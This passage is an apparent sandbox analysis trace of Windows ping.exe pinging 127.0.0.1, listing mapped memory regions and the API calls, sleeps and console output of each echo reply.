0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 7570 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7571 start_va = 0x7ea40000 end_va = 0x7eb3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea40000" filename = "" Region: id = 7572 start_va = 0x5d0000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 7573 start_va = 0x610000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 7574 start_va = 0x7eb6a000 end_va = 0x7eb6cfff entry_point = 0x0 region_type = private name = "private_0x000000007eb6a000" filename = "" Region: id = 7575 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 7576 start_va = 0x480000 end_va = 0x482fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 7577 start_va = 0x650000 end_va = 0x650fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 7578 start_va = 0x660000 end_va = 0x662fff entry_point = 0x660000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 7579 start_va = 0x670000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 7580 start_va = 0x6f0000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 7581 start_va = 0x7ea3d000 end_va = 0x7ea3ffff entry_point = 0x0 region_type = private name = "private_0x000000007ea3d000" filename = "" Thread: id = 409 os_tid = 0xbcc [0133.350] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0133.350] __set_app_type (_Type=0x1) [0133.350] __p__fmode () returned 0x76ea1768 [0133.350] __p__commode () returned 0x76ea176c [0133.350] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0133.350] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0133.351] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.352] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0133.352] _fileno (_File=0x76ea4c28) returned 1 [0133.352] _get_osfhandle (_FileHandle=1) returned 0x28 [0133.352] GetFileType (hFile=0x28) returned 0x2 [0133.352] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x51f260 | out: lpMode=0x51f260) returned 0 [0133.352] GetLastError () returned 0x6 [0133.352] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x51f1c4, nSize=0x50 | out: lpBuffer="䤐\x82") returned 0x0 [0133.352] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0133.354] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x51f27c | out: phkResult=0x51f27c*=0x88) returned 0x0 [0133.354] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x51f270, lpData=0x51f278, lpcbData=0x51f274*=0x4 | out: lpType=0x51f270*=0x0, lpData=0x51f278*=0x0, lpcbData=0x51f274*=0x4) returned 0x2 [0133.354] RegCloseKey (hKey=0x88) returned 0x0 [0133.354] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x51f240*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x51f27c | out: ppResult=0x51f27c*=0x82c188*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8289b8*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0133.355] FreeAddrInfoW (pAddrInfo=0x82c188*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8289b8*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0133.355] IcmpCreateFile () returned 0x826c28 [0133.357] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x82c160 [0133.357] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x835270 [0133.357] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x51f378, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0133.359] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x51f270, nSize=0x0, Arguments=0x51f26c | out: lpBuffer="竈\x83ﱀQ┗\x94䰨盪❋") returned 0x14 [0133.359] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0133.359] _fileno (_File=0x76ea4c28) returned 1 [0133.359] _get_osfhandle (_FileHandle=1) returned 0x28 [0133.359] GetFileType (hFile=0x28) returned 0x2 [0133.359] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x51f234 | out: lpMode=0x51f234) returned 0 [0133.359] GetLastError () returned 0x6 [0133.359] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x51f198, nSize=0x50 | out: lpBuffer="Q❋") returned 0x0 [0133.359] _fileno (_File=0x76ea4c28) returned 1 [0133.359] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0133.359] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0133.360] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x837b00 [0133.360] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x837b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0133.360] _fileno (_File=0x76ea4c28) returned 1 [0133.360] _write (in: _FileHandle=1, _Buf=0x837b00*, _MaxCharCount=0x14 | out: _Buf=0x837b00*) returned 20 [0133.360] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0133.360] _fileno (_File=0x76ea4c28) returned 1 [0133.360] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0133.360] LocalFree (hMem=0x837b00) returned 0x0 [0133.360] LocalFree (hMem=0x837ac8) returned 0x0 [0133.360] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x51f270, nSize=0x0, Arguments=0x51f26c | out: lpBuffer="竈\x83ﱀQ▪\x94䰨盪❚") returned 0x18 [0133.360] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0133.360] _fileno (_File=0x76ea4c28) returned 1 [0133.360] _get_osfhandle (_FileHandle=1) returned 0x28 [0133.360] GetFileType (hFile=0x28) returned 0x2 [0133.360] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x51f234 | out: lpMode=0x51f234) returned 0 [0133.360] GetLastError () returned 0x6 [0133.360] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x51f198, nSize=0x50 | out: lpBuffer="Q❚") returned 0x0 [0133.360] _fileno (_File=0x76ea4c28) returned 1 [0133.360] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0133.360] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0133.360] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x82c368 [0133.360] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x82c368, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0133.360] _fileno (_File=0x76ea4c28) returned 1 [0133.360] _write (in: _FileHandle=1, _Buf=0x82c368*, _MaxCharCount=0x18 | out: _Buf=0x82c368*) returned 24 [0133.360] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0133.360] _fileno (_File=0x76ea4c28) returned 1 [0133.360] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0133.360] LocalFree (hMem=0x82c368) returned 0x0 [0133.360] LocalFree (hMem=0x837ac8) returned 0x0 [0133.360] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0133.360] IcmpSendEcho2Ex (in: IcmpHandle=0x826c28, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x82c160, RequestSize=0x20, RequestOptions=0x51f2ec, ReplyBuffer=0x835270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x835270) returned 0x1 [0133.361] InetNtopW (in: Family=2, pAddr=0x51f2dc, pStringBuf=0x51f404, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0133.361] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x51f270, nSize=0x0, Arguments=0x51f26c | out: lpBuffer="笈\x83ﱀQ⛔\x94䰨盪✣") returned 0x16 [0133.361] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0133.361] _fileno (_File=0x76ea4c28) returned 1 [0133.361] _get_osfhandle (_FileHandle=1) returned 0x28 [0133.361] GetFileType (hFile=0x28) returned 0x2 [0133.361] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x51f234 | out: lpMode=0x51f234) returned 0 [0133.361] GetLastError () returned 0x6 [0133.361] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x51f198, nSize=0x50 | out: lpBuffer="Q✣") returned 0x0 [0133.361] _fileno (_File=0x76ea4c28) returned 1 [0133.361] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0133.361] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0133.361] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x837b40 [0133.361] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x837b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0133.361] _fileno (_File=0x76ea4c28) returned 1 [0133.361] _write (in: _FileHandle=1, _Buf=0x837b40*, _MaxCharCount=0x16 | out: _Buf=0x837b40*) returned 22 [0133.361] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0133.361] _fileno (_File=0x76ea4c28) returned 1 [0133.361] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0133.361] LocalFree (hMem=0x837b40) returned 0x0 [0133.361] LocalFree (hMem=0x837b08) returned 0x0 [0133.361] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x51f270, nSize=0x0, Arguments=0x51f26c | out: lpBuffer="笈\x83ﱀQ⛿\x94䰨盪✼") returned 0x9 [0133.361] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0133.361] _fileno (_File=0x76ea4c28) returned 1 [0133.362] _get_osfhandle (_FileHandle=1) returned 0x28 [0133.362] GetFileType (hFile=0x28) returned 0x2 [0133.362] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x51f234 | out: lpMode=0x51f234) returned 0 [0133.362] GetLastError () returned 0x6 [0133.362] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x51f198, nSize=0x50 | out: lpBuffer="Q✼") returned 0x0 [0133.362] _fileno (_File=0x76ea4c28) returned 1 [0133.362] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0133.362] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0133.362] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x828988 [0133.362] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x828988, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0133.362] _fileno (_File=0x76ea4c28) returned 1 [0133.362] _write (in: _FileHandle=1, _Buf=0x828988*, _MaxCharCount=0x9 | out: _Buf=0x828988*) returned 9 [0133.362] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0133.362] _fileno (_File=0x76ea4c28) returned 1 [0133.362] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0133.362] LocalFree (hMem=0x828988) returned 0x0 [0133.362] LocalFree (hMem=0x837b08) returned 0x0 [0133.362] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x51f274, nSize=0x0, Arguments=0x51f270 | out: lpBuffer="笈\x83ﱀQ➷\x94䰨盪✧") returned 0x9 [0133.362] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0133.362] _fileno (_File=0x76ea4c28) returned 1 [0133.362] _get_osfhandle (_FileHandle=1) returned 0x28 [0133.362] GetFileType (hFile=0x28) returned 0x2 [0133.362] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x51f238 | out: lpMode=0x51f238) returned 0 [0133.362] GetLastError () returned 0x6 [0133.362] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x51f19c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0133.362] _fileno (_File=0x76ea4c28) returned 1 [0133.362] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0133.362] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0133.362] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x8289b8 [0133.362] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x8289b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0133.362] _fileno (_File=0x76ea4c28) returned 1 [0133.362] _write (in: _FileHandle=1, _Buf=0x8289b8*, _MaxCharCount=0x9 | out: _Buf=0x8289b8*) returned 9 [0133.362] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0133.362] _fileno (_File=0x76ea4c28) returned 1 [0133.362] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0133.362] LocalFree (hMem=0x8289b8) returned 0x0 [0133.362] LocalFree (hMem=0x837b08) returned 0x0 [0133.362] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x51f270, nSize=0x0, Arguments=0x51f26c | out: lpBuffer="笈\x83ﱀQ⟘\x94䰨盪✨") returned 0x9 [0133.362] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0133.362] _fileno (_File=0x76ea4c28) returned 1 [0133.362] _get_osfhandle (_FileHandle=1) returned 0x28 [0133.362] GetFileType (hFile=0x28) returned 0x2 [0133.362] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x51f234 | out: lpMode=0x51f234) returned 0 [0133.362] GetLastError () returned 0x6 [0133.362] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x51f198, nSize=0x50 | out: lpBuffer="Q✨") returned 0x0 [0133.362] _fileno (_File=0x76ea4c28) returned 1 [0133.362] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0133.362] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0133.362] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x8289a0 [0133.362] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x8289a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0133.362] _fileno (_File=0x76ea4c28) returned 1 [0133.362] _write (in: _FileHandle=1, _Buf=0x8289a0*, _MaxCharCount=0x9 | out: _Buf=0x8289a0*) returned 9 [0133.363] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0133.363] _fileno (_File=0x76ea4c28) returned 1 [0133.363] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0133.363] LocalFree (hMem=0x8289a0) returned 0x0 [0133.363] LocalFree (hMem=0x837b08) returned 0x0 [0133.363] Sleep (dwMilliseconds=0x3e8) [0134.371] IcmpSendEcho2Ex (in: IcmpHandle=0x826c28, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x82c160, RequestSize=0x20, RequestOptions=0x51f2ec, ReplyBuffer=0x835270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x835270) returned 0x1 [0134.372] InetNtopW (in: Family=2, pAddr=0x51f2dc, pStringBuf=0x51f404, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0134.372] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x51f270, nSize=0x0, Arguments=0x51f26c | out: lpBuffer="羠\x83ﱀQ⛔\x94䰨盪✣") returned 0x16 [0134.372] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0134.372] _fileno (_File=0x76ea4c28) returned 1 [0134.372] _get_osfhandle (_FileHandle=1) returned 0x28 [0134.372] GetFileType (hFile=0x28) returned 0x2 [0134.372] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x51f234 | out: lpMode=0x51f234) returned 0 [0134.372] GetLastError () returned 0x6 [0134.372] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x51f198, nSize=0x50 | out: lpBuffer="Q✣") returned 0x0 [0134.372] _fileno (_File=0x76ea4c28) returned 1 [0134.372] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0134.372] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0134.372] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x837fd8 [0134.372] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x837fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0134.372] _fileno (_File=0x76ea4c28) returned 1 [0134.372] _write (in: _FileHandle=1, _Buf=0x837fd8*, _MaxCharCount=0x16 | out: _Buf=0x837fd8*) returned 22 [0134.372] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0134.372] _fileno (_File=0x76ea4c28) returned 1 [0134.372] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0134.372] LocalFree (hMem=0x837fd8) returned 0x0 [0134.372] LocalFree (hMem=0x837fa0) returned 0x0 [0134.372] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x51f270, nSize=0x0, Arguments=0x51f26c | out: lpBuffer="羠\x83ﱀQ⛿\x94䰨盪✼") returned 0x9 [0134.373] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0134.373] _fileno (_File=0x76ea4c28) returned 1 [0134.373] _get_osfhandle (_FileHandle=1) returned 0x28 [0134.373] GetFileType (hFile=0x28) returned 0x2 [0134.373] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x51f234 | out: lpMode=0x51f234) returned 0 [0134.373] GetLastError () returned 0x6 [0134.373] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x51f198, nSize=0x50 | out: lpBuffer="Q✼") returned 0x0 [0134.373] _fileno (_File=0x76ea4c28) returned 1 [0134.373] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0134.373] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0134.373] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x828988 [0134.373] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x828988, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0134.373] _fileno (_File=0x76ea4c28) returned 1 [0134.373] _write (in: _FileHandle=1, _Buf=0x828988*, _MaxCharCount=0x9 | out: _Buf=0x828988*) returned 9 [0134.373] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0134.373] _fileno (_File=0x76ea4c28) returned 1 [0134.373] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0134.373] LocalFree (hMem=0x828988) returned 0x0 [0134.373] LocalFree (hMem=0x837fa0) returned 0x0 [0134.373] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x51f274, nSize=0x0, Arguments=0x51f270 | out: lpBuffer="羠\x83ﱀQ➷\x94䰨盪✧") returned 0x9 [0134.373] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0134.373] _fileno (_File=0x76ea4c28) returned 1 [0134.373] _get_osfhandle (_FileHandle=1) returned 0x28 [0134.373] GetFileType (hFile=0x28) returned 0x2 [0134.373] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x51f238 | out: lpMode=0x51f238) returned 0 [0134.373] GetLastError () returned 0x6 [0134.373] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x51f19c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0134.373] _fileno (_File=0x76ea4c28) returned 1 [0134.373] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0134.373] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0134.373] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x828a00 [0134.373] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x828a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0134.373] _fileno (_File=0x76ea4c28) returned 1 [0134.373] _write (in: _FileHandle=1, _Buf=0x828a00*, _MaxCharCount=0x9 | out: _Buf=0x828a00*) returned 9 [0134.373] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0134.373] _fileno (_File=0x76ea4c28) returned 1 [0134.373] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0134.373] LocalFree (hMem=0x828a00) returned 0x0 [0134.373] LocalFree (hMem=0x837fa0) returned 0x0 [0134.373] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x51f270, nSize=0x0, Arguments=0x51f26c | out: lpBuffer="羠\x83ﱀQ⟘\x94䰨盪✨") returned 0x9 [0134.373] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0134.373] _fileno (_File=0x76ea4c28) returned 1 [0134.373] _get_osfhandle (_FileHandle=1) returned 0x28 [0134.373] GetFileType (hFile=0x28) returned 0x2 [0134.373] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x51f234 | out: lpMode=0x51f234) returned 0 [0134.373] GetLastError () returned 0x6 [0134.373] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x51f198, nSize=0x50 | out: lpBuffer="Q✨") returned 0x0 [0134.373] _fileno (_File=0x76ea4c28) returned 1 [0134.373] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0134.373] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0134.373] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x828988 [0134.374] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x828988, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0134.374] _fileno (_File=0x76ea4c28) returned 1 [0134.374] _write (in: _FileHandle=1, _Buf=0x828988*, _MaxCharCount=0x9 | out: _Buf=0x828988*) returned 9 [0134.374] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0134.374] _fileno (_File=0x76ea4c28) returned 1 [0134.374] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0134.374] LocalFree (hMem=0x828988) returned 0x0 [0134.374] LocalFree (hMem=0x837fa0) returned 0x0 [0134.374] Sleep (dwMilliseconds=0x3e8) [0135.387] IcmpSendEcho2Ex (in: IcmpHandle=0x826c28, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x82c160, RequestSize=0x20, RequestOptions=0x51f2ec, ReplyBuffer=0x835270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x835270) returned 0x1 [0135.388] InetNtopW (in: Family=2, pAddr=0x51f2dc, pStringBuf=0x51f404, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0135.388] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x51f270, nSize=0x0, Arguments=0x51f26c | out: lpBuffer="羠\x83ﱀQ⛔\x94䰨盪✣") returned 0x16 [0135.388] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.388] _fileno (_File=0x76ea4c28) returned 1 [0135.388] _get_osfhandle 